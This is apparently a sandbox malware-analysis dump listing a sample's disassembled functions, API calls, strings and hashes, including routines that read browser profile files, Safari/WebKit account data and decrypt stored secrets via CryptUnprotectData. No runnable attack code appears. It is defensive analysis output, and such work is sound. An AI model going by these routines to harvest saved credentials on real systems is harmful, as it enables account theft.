                                                                    • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                    • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                    APIs
                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@
                                                                    • String ID:
                                                                    • API String ID: 1936579350-0
                                                                    • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                    • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                    • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                    • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                    APIs
                                                                    • GetLastError.KERNEL32 ref: 004182D7
                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                    • LocalFree.KERNEL32(?), ref: 00418342
                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                                      • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                                                      • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                                    • String ID: OsError 0x%x (%u)
                                                                    • API String ID: 403622227-2664311388
                                                                    • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                    • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                    • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                    • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: Version
                                                                    • String ID:
                                                                    • API String ID: 1889659487-0
                                                                    • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                    • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                    • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                    • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                    APIs
                                                                    • _wcsicmp.MSVCRT ref: 004022A6
                                                                    • _wcsicmp.MSVCRT ref: 004022D7
                                                                    • _wcsicmp.MSVCRT ref: 00402305
                                                                    • _wcsicmp.MSVCRT ref: 00402333
                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                    • memset.MSVCRT ref: 0040265F
                                                                    • memcpy.MSVCRT ref: 0040269B
                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                      • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                    • memcpy.MSVCRT ref: 004026FF
                                                                    • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                    • API String ID: 2929817778-1134094380
                                                                    • Opcode ID: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                                                    • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                    • Opcode Fuzzy Hash: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                                                    • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                    • GetWindowRect.USER32(?,?), ref: 00414088
                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                    • GetDC.USER32 ref: 004140E3
                                                                    • wcslen.MSVCRT ref: 00414123
                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                    • ReleaseDC.USER32(?,?), ref: 00414181
                                                                    • _snwprintf.MSVCRT ref: 00414244
                                                                    • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                    • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                    • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                    • GetClientRect.USER32(?,?), ref: 004142E1
                                                                    • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                    • GetClientRect.USER32(?,?), ref: 0041433B
                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                    • String ID: %s:$EDIT$STATIC
                                                                    • API String ID: 2080319088-3046471546
                                                                    • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                    • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                    • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                    • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                    APIs
                                                                    • EndDialog.USER32(?,?), ref: 00413221
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                    • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                    • memset.MSVCRT ref: 00413292
                                                                    • memset.MSVCRT ref: 004132B4
                                                                    • memset.MSVCRT ref: 004132CD
                                                                    • memset.MSVCRT ref: 004132E1
                                                                    • memset.MSVCRT ref: 004132FB
                                                                    • memset.MSVCRT ref: 00413310
                                                                    • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                    • memset.MSVCRT ref: 004133C0
                                                                    • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                    • memcpy.MSVCRT ref: 004133FC
                                                                    • wcscpy.MSVCRT ref: 0041341F
                                                                    • _snwprintf.MSVCRT ref: 0041348E
                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                    • SetFocus.USER32(00000000), ref: 004134B7
                                                                    Strings
                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                    • {Unknown}, xrefs: 004132A6
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                    • API String ID: 4111938811-1819279800
                                                                    • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                    • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                    • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                    • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                    • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                    • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                    • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                    • EndDialog.USER32(?,?), ref: 0040135E
                                                                    • DeleteObject.GDI32(?), ref: 0040136A
                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                    • ShowWindow.USER32(00000000), ref: 00401398
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                    • ShowWindow.USER32(00000000), ref: 004013A7
                                                                    • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                    • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                    • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                    • String ID:
                                                                    • API String ID: 829165378-0
                                                                    • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                    • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                    • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                    • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00404172
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                    • wcscpy.MSVCRT ref: 004041D6
                                                                    • wcscpy.MSVCRT ref: 004041E7
                                                                    • memset.MSVCRT ref: 00404200
                                                                    • memset.MSVCRT ref: 00404215
                                                                    • _snwprintf.MSVCRT ref: 0040422F
                                                                    • wcscpy.MSVCRT ref: 00404242
                                                                    • memset.MSVCRT ref: 0040426E
                                                                    • memset.MSVCRT ref: 004042CD
                                                                    • memset.MSVCRT ref: 004042E2
                                                                    • _snwprintf.MSVCRT ref: 004042FE
                                                                    • wcscpy.MSVCRT ref: 00404311
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                    • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                    • API String ID: 2454223109-1580313836
                                                                    • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                    • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                    • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                    • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                    • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                    • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                    • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                    • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                    • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule
                                                                    • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll$p+8w@F8w@B8w
                                                                    • API String ID: 667068680-4123708296
                                                                    • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                    • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                    • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                    • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                    APIs
                                                                      • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                    • SetMenu.USER32(?,00000000), ref: 00411453
                                                                    • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                    • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                    • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                    • memcpy.MSVCRT ref: 004115C8
                                                                    • ShowWindow.USER32(?,?), ref: 004115FE
                                                                    • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                    • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                    • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                    • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                    • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                      • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                      • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                    • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                    • API String ID: 4054529287-3175352466
                                                                    • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                    • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                    • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                    • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintf$memset$wcscpy
                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                    • API String ID: 2000436516-3842416460
                                                                    • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                    • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                    • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                    • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                    APIs
                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                      • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                      • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                      • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                    • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                    • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                    • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                    • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                    • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                    • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                    • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                    • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                    • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                    • String ID:
